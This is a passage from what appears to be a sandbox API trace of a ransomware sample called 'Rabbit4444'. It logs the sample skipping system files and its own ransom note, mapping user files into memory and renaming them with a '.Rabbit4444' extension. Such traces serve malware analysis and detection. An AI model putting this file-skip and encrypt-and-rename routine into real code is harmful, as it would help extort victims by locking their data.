lpString2=".sys") returned 1 [0059.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd2a5953-36a2-427d-b762-3610f37a5d89}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.493] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.493] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15080335584) returned 1 [0059.493] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1014) returned 1 [0059.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.493] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.494] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.495] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15080583346) returned 1 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.495] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.495] CloseHandle (hObject=0x298) returned 1 [0059.495] CloseHandle (hObject=0x278) returned 1 [0059.495] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms.Rabbit4444") returned 192 [0059.495] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd2a5953-36a2-427d-b762-3610f37a5d89}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd2a5953-36a2-427d-b762-3610f37a5d89}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.496] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x560b3f8e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x560b3f8e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", cAlternateFileName="CLB5AB~1.SET")) returned 1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2=".") returned 1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="..") returned 1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="windows") returned -1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.496] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="boot") returned 1 [0059.497] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.497] lstrcmpiW (lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.497] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms" | out: lpString1="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms") returned="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms" [0059.497] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.497] lstrlenW (lpString="Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms") returned 64 [0059.497] lstrlenW (lpString="Rabbit4444") returned 10 [0059.497] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.497] lstrlenW (lpString=".dll") returned 4 [0059.497] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.497] lstrlenW (lpString=".lnk") returned 4 [0059.497] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.497] lstrlenW (lpString=".ini") returned 4 [0059.497] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.497] lstrlenW (lpString=".sys") returned 4 [0059.497] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd95d0e3-6b3a-495b-9fda-57fad586304d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.497] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15080829849) returned 1 [0059.498] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=961) returned 1 [0059.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0059.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.498] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.499] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.500] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15081077920) returned 1 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0059.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.500] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.500] CloseHandle (hObject=0x298) returned 1 [0059.500] CloseHandle (hObject=0x278) returned 1 [0059.500] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms.Rabbit4444") returned 192 [0059.500] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd95d0e3-6b3a-495b-9fda-57fad586304d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cd95d0e3-6b3a-495b-9fda-57fad586304d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.501] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56132717, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56132717, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2222ad59, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", cAlternateFileName="CLDB86~1.SET")) returned 1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2=".") returned 1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="..") returned 1 [0059.501] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="windows") returned -1 [0059.502] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.502] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.502] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="boot") returned 1 [0059.502] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.502] lstrcmpiW (lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.502] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms" | out: lpString1="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms") returned="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms" [0059.502] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.502] lstrlenW (lpString="Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms") returned 64 [0059.502] lstrlenW (lpString="Rabbit4444") returned 10 [0059.502] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.502] lstrlenW (lpString=".dll") returned 4 [0059.502] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.502] lstrlenW (lpString=".lnk") returned 4 [0059.502] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.502] lstrlenW (lpString=".ini") returned 4 [0059.502] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.502] lstrlenW (lpString=".sys") returned 4 [0059.502] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cf081448-68ec-4969-9f8b-bb23b329b712}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.503] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.503] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15081335623) returned 1 [0059.503] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=978) returned 1 [0059.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.503] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.504] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.505] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15081583851) returned 1 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.505] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.505] CloseHandle (hObject=0x298) returned 1 [0059.505] CloseHandle (hObject=0x278) returned 1 [0059.505] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms.Rabbit4444") returned 192 [0059.505] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cf081448-68ec-4969-9f8b-bb23b329b712}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{cf081448-68ec-4969-9f8b-bb23b329b712}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.506] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561cb079, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x561cb079, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", cAlternateFileName="CL9AC1~1.SET")) returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2=".") returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="..") returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="windows") returned -1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="boot") returned 1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.509] lstrcmpiW (lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.509] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms" | out: lpString1="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms") returned="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms" [0059.509] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.509] lstrlenW (lpString="Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms") returned 64 [0059.509] lstrlenW (lpString="Rabbit4444") returned 10 [0059.510] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.510] lstrlenW (lpString=".dll") returned 4 [0059.510] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.510] lstrlenW (lpString=".lnk") returned 4 [0059.510] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.510] lstrlenW (lpString=".ini") returned 4 [0059.510] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.510] lstrlenW (lpString=".sys") returned 4 [0059.510] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.510] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.510] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.510] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15082086503) returned 1 [0059.510] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=940) returned 1 [0059.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.510] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.511] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.513] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15082342265) returned 1 [0059.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.513] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.513] CloseHandle (hObject=0x298) returned 1 [0059.513] CloseHandle (hObject=0x278) returned 1 [0059.513] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms.Rabbit4444") returned 192 [0059.513] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms" 